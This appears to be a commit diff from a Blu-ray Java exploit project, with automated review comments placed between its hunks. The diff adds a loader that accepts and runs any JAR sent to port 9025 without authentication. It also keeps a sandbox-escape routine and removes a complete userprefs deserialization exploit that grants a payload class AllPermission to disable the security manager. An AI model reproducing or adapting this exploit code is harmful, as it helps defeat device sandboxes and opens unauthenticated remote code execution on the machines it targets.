Add remote JAR loader and remove userprefs exploit.

Andy Nguyen 2024-11-28 19:02:08 +01:00
parent cca6e2810b
commit 44713ef59f
10 changed files with 121 additions and 206 deletions


@ -5,8 +5,12 @@ LIB = lib
SRC = src SRC = src
TOOLS = tools TOOLS = tools
CLASSES = \ LOADER_CLASSES = \
$(SRC)/com/bdjb/ExploitXlet.java \ $(SRC)/com/bdjb/LoaderXlet.java \
$(SRC)/com/bdjb/Loader.java \
$(SRC)/com/bdjb/Screen.java \
EXPLOIT_CLASSES = \
$(SRC)/com/bdjb/Exploit.java \ $(SRC)/com/bdjb/Exploit.java \
$(SRC)/com/bdjb/Screen.java \ $(SRC)/com/bdjb/Screen.java \
$(SRC)/com/bdjb/api/API.java \ $(SRC)/com/bdjb/api/API.java \
@ -25,39 +29,42 @@ CLASSES = \
$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \ $(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \ $(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \ $(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \ $(SRC)/com/bdjb/exploit/sandbox/Payload.java \
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \ $(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar" JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
all: directory serialized classes jar bdjo_bdmv all: loader exploit
directory: loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
exploit: build_directory exploit_classes exploit_jar
build_directory:
mkdir -p $(BUILD) mkdir -p $(BUILD)
serialized: loader_classes:
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
classes: exploit_classes:
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES) javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
jar: loader_jar:
rm -rf $(BUILD)/jdk
mkdir -p $(DISC)/BDMV/JAR mkdir -p $(DISC)/BDMV/JAR
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd .. cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
bdjo_bdmv: exploit_jar:
rm -rf $(BUILD)/jdk
cd $(BUILD) && jar cf 00000.jar . && cd ..
loader_bdjo_bdmv:
mkdir -p $(DISC)/BDMV/BDJO mkdir -p $(DISC)/BDMV/BDJO
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
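Review bot: `loader_classes` and `exploit_classes` both compile into the same `$(BUILD)` directory (`javac -d $(BUILD) ...` in each), and `exploit_jar` packages that directory wholesale (`cd $(BUILD) && jar cf 00000.jar .`), so after `all: loader exploit` the exploit JAR appears to also carry the loader classes and the `bluray.LoaderXlet.perm` file copied there by `loader_jar`; run in the other order, the exploit classes would end up in the signed disc JAR instead. Consider separate output directories, e.g. `LOADER_BUILD = $(BUILD)/loader` and `EXPLOIT_BUILD = $(BUILD)/exploit` used by the respective `*_classes` and `*_jar` targets, or a `rm -rf $(BUILD)` at the start of each `*_classes` target. The `rm -rf $(BUILD)/jdk` already present in both jar targets suggests this kind of cleanup is expected; a short comment above `all:` stating which artifact each target produces would also help.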


@ -15,7 +15,7 @@
<classpathExtension></classpathExtension> <classpathExtension></classpathExtension>
<iconFlags>0x0</iconFlags> <iconFlags>0x0</iconFlags>
<iconLocator></iconLocator> <iconLocator></iconLocator>
<initialClassName>com.bdjb.ExploitXlet</initialClassName> <initialClassName>com.bdjb.LoaderXlet</initialClassName>
<priority>128</priority> <priority>128</priority>
<profiles> <profiles>
<majorVersion>1</majorVersion> <majorVersion>1</majorVersion>


@ -9,26 +9,16 @@ package com.bdjb;
import com.bdjb.exploit.kernel.ExploitKernelInterface; import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl; import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface; import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl; import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
import java.io.FileOutputStream; import java.lang.reflect.Method;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
class Exploit implements Runnable {
static void init() {
Screen.println("[+] bd-jb by theflow");
public class Exploit {
public static void main(Method screenPrintln) {
Screen.setRemotePrintln(screenPrintln);
Screen.println("[*] Escaping Java Sandbox..."); Screen.println("[*] Escaping Java Sandbox...");
Class[] sandboxExploits = Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
new Class[] {
ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
};
for (int i = 0; i < sandboxExploits.length; i++) { for (int i = 0; i < sandboxExploits.length; i++) {
try { try {
@ -46,29 +36,4 @@ class Exploit implements Runnable {
Screen.println("[-] Error could not disable security manager."); Screen.println("[-] Error could not disable security manager.");
} }
} }
static void start() {
new Thread(new Exploit()).start();
}
public void run() {
if (System.getSecurityManager() != null) {
return;
}
Screen.println("[*] Exploiting kernel...");
Class[] kernelExploits = new Class[] {};
for (int i = 0; i < kernelExploits.length; i++) {
try {
ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
if (exploit.trigger()) {
break;
}
} catch (Exception e) {
continue;
}
}
}
} }
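Review bot: `import com.bdjb.exploit.kernel.ExploitKernelInterface;` is kept on the new side of the first hunk, but the only use of that type visible here (the kernel-exploit loop in the removed `run()`) goes away in the second hunk, so the import looks unused now unless the type is referenced in a part of the file outside these hunks. The new entry point `main(Method screenPrintln)` is invoked reflectively by the loader rather than by the JVM, which deserves a Javadoc saying so and documenting the argument, e.g. `/** Entry point called reflectively by the loader JAR. screenPrintln is the loader-side Screen.println(String); when null, output stays on this JAR's own Screen. */` — the null fallback follows from the `remoteScreenPrintln != null` check in `Screen.println`. The body of `Exploit` continues past the end of the first hunk.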

73
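--- /dev/null
+++ b/src/com/bdjb/Loader.java
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license. See the LICENSE file for details.
+ */
+package com.bdjb;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.lang.reflect.Method;
+import org.dvb.lang.DVBClassLoader;
+class Loader implements Runnable {
+private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
+private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
+private static final String MAIN_METHOD_NAME = "main";
+private static final String PRINTLN_METHOD_NAME = "println";
+static void startJarLoader() {
+new Thread(new Loader()).start();
+}
+public void run() {
+Screen.println("[+] bd-jb by theflow");
+while (true) {
+Screen.println("[*] Listening for remote JAR on port 9025...");
+try {
+ServerSocket serverSocket = new ServerSocket(9025);
+Socket socket = serverSocket.accept();
+InputStream inputStream = socket.getInputStream();
+OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
+byte[] buf = new byte[8192];
+int total = 0;
+int read;
+while ((read = inputStream.read(buf)) > 0) {
+outputStream.write(buf, 0, read);
+total += read;
+}
+outputStream.close();
+inputStream.close();
+serverSocket.close();
+Screen.println("[+] Received " + total + " bytes");
+Screen.println("[+] Launching JAR...");
+DVBClassLoader dvbClassLoader =
+DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
+Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
+Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
+Method screenPrintln =
+Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
+main.invoke(null, new Object[] {screenPrintln});
+Screen.println("[+] JAR exited");
+} catch (Exception e) {
+Screen.println("[-] Error: " + e.getMessage());
+}
+}
+}
+}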
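Review bot: In `run()` the `ServerSocket`, the accepted `Socket` and the `FileOutputStream` are closed only on the success path (the three `close()` calls before "Launching JAR"); if `accept()`, `read()`, `write()` or the `DVBClassLoader`/`invoke` step throws, the socket bound to 9025 leaks, the next iteration's `new ServerSocket(9025)` fails to bind, and the `while (true)` loop spins printing `[-] Error` without ever accepting another connection. The Makefile builds with `-source 1.4`, so try-with-resources is unavailable; moving the receive step into a helper whose `finally` closes all three keeps the port released before the JAR's `main` runs, as today, while also covering the failure path. `e.getMessage()` is null for some exceptions, so `"[-] Error: " + e` gives a more useful line. A class header comment should also state that the listener accepts a connection from any peer without authentication or integrity checking of the received JAR before executing it — the intended use here, but something anyone enabling this target should see.
```java
  public void run() {
    Screen.println("[+] bd-jb by theflow");
    while (true) {
      Screen.println("[*] Listening for remote JAR on port 9025...");
      try {
        receiveJar();
        Screen.println("[+] Launching JAR...");
        // … unchanged: DVBClassLoader.newInstance, loadClass, getMethod and main.invoke …
      } catch (Exception e) {
        Screen.println("[-] Error: " + e);
      }
    }
  }

  /** Accepts one connection on port 9025 and writes everything it sends to MNT_ADA_JAR_FILE. */
  private static void receiveJar() throws Exception {
    ServerSocket serverSocket = null;
    Socket socket = null;
    OutputStream outputStream = null;
    try {
      serverSocket = new ServerSocket(9025);
      socket = serverSocket.accept();
      InputStream inputStream = socket.getInputStream();
      outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
      // … unchanged: 8192-byte copy loop accumulating total …
      Screen.println("[+] Received " + total + " bytes");
    } finally {
      // Release the port and the (possibly partial) file on every path; a leaked
      // ServerSocket makes the next bind to 9025 fail and the caller's loop spin.
      if (outputStream != null) { try { outputStream.close(); } catch (Exception ignored) { } }
      if (socket != null) { try { socket.close(); } catch (Exception ignored) { } }
      if (serverSocket != null) { try { serverSocket.close(); } catch (Exception ignored) { } }
    }
  }
```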


@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
import org.havi.ui.HScene; import org.havi.ui.HScene;
import org.havi.ui.HSceneFactory; import org.havi.ui.HSceneFactory;
public class ExploitXlet implements Xlet { public class LoaderXlet implements Xlet {
private HScene scene; private HScene scene;
private Screen screen; private Screen screen;
public void initXlet(XletContext context) { public void initXlet(XletContext context) {
Exploit.init();
screen = Screen.getInstance(); screen = Screen.getInstance();
screen.setSize(1920, 1080); // BD screen size screen.setSize(1920, 1080); // BD screen size
@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
public void startXlet() { public void startXlet() {
screen.setVisible(true); screen.setVisible(true);
scene.setVisible(true); scene.setVisible(true);
Exploit.start(); Loader.startJarLoader();
} }
public void pauseXlet() { public void pauseXlet() {


@ -11,6 +11,7 @@ import java.awt.Color;
import java.awt.Container; import java.awt.Container;
import java.awt.Font; import java.awt.Font;
import java.awt.Graphics; import java.awt.Graphics;
import java.lang.reflect.Method;
import java.util.ArrayList; import java.util.ArrayList;
public class Screen extends Container { public class Screen extends Container {
@ -22,13 +23,27 @@ public class Screen extends Container {
private static final Screen instance = new Screen(); private static final Screen instance = new Screen();
private static Method remoteScreenPrintln = null;
public static Screen getInstance() { public static Screen getInstance() {
return instance; return instance;
} }
public static void setRemotePrintln(Method screenPrintln) {
remoteScreenPrintln = screenPrintln;
}
public static void println(String msg) { public static void println(String msg) {
messages.add(msg); if (remoteScreenPrintln != null) {
instance.repaint(); try {
remoteScreenPrintln.invoke(null, new Object[] {msg});
} catch (Exception e) {
// Ignore.
}
} else {
messages.add(msg);
instance.repaint();
}
} }
public void paint(Graphics g) { public void paint(Graphics g) {
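Review bot: In the new `println`, when `remoteScreenPrintln` is set but `invoke` throws, the `catch (Exception e) { // Ignore. }` drops the message entirely — it neither reaches the remote screen nor the local `messages` list, because the local path sits in the `else` branch. Falling back to the local screen on failure keeps output visible instead of silently losing it, at the cost of a `return` after the successful invoke. `setRemotePrintln` also deserves a Javadoc, e.g. `/** Routes later println calls to the given static println(String) Method (the loader's Screen); pass null to print on this Screen again. */`. Whether `remoteScreenPrintln` is ever written from a thread other than the one calling `println` is not visible here; if it is, the static field would need `volatile`.
```java
  public static void println(String msg) {
    if (remoteScreenPrintln != null) {
      try {
        remoteScreenPrintln.invoke(null, new Object[] {msg});
        return;
      } catch (Exception e) {
        // Remote screen unreachable; fall back to the local one so the message is not lost.
      }
    }
    messages.add(msg);
    instance.repaint();
  }
```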


@ -1,61 +0,0 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb.exploit.sandbox;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import org.havi.ui.HSceneFactory;
/** Implementation of the userprefs deserialization exploit. */
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
public boolean trigger() throws Exception {
try {
// Overwrite userprefs with a serialized PayloadClassLoader.
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
outputStream.close();
inputStream.close();
// Trigger deserialization vulnerability.
try {
HSceneFactory.getInstance().getDefaultHScene();
} catch (ClassCastException e) {
// Exception expected.
// Instantiate the payload class.
PayloadClassLoader.getInstance().newPayload();
return System.getSecurityManager() == null;
}
} finally {
// Restore userprefs file.
String[][] preferences = new String[9][];
preferences[3] = new String[] {"26"};
ObjectOutputStream outputStream =
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
outputStream.writeObject(preferences);
outputStream.close();
}
return false;
}
}


@ -1,57 +0,0 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb.exploit.sandbox;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.security.AllPermission;
import java.security.Permissions;
import java.security.ProtectionDomain;
/** ClassLoader subclass that is instantiated on deserialization. */
class PayloadClassLoader extends ClassLoader implements Serializable {
private static final long serialVersionUID = 0x4141414141414141L;
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
private static PayloadClassLoader instance;
static PayloadClassLoader getInstance() {
return instance;
}
private void readObject(ObjectInputStream stream) {
instance = this;
}
void newPayload() throws Exception {
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
inputStream.close();
byte[] payload = outputStream.toByteArray();
// Instantiate the payload class with all permissions to disable the security manager.
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
Class payloadClass =
defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
payloadClass.newInstance();
}
}


@ -1,25 +0,0 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb.exploit.sandbox;
import com.bdjb.exploit.sandbox.PayloadClassLoader;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
/** Simple util to create a serialized object of the PayloadClassLoader class. */
class PayloadClassLoaderSerializer {
public static void main(String[] args) {
try {
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
objectOutputStream.writeObject(new PayloadClassLoader());
objectOutputStream.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}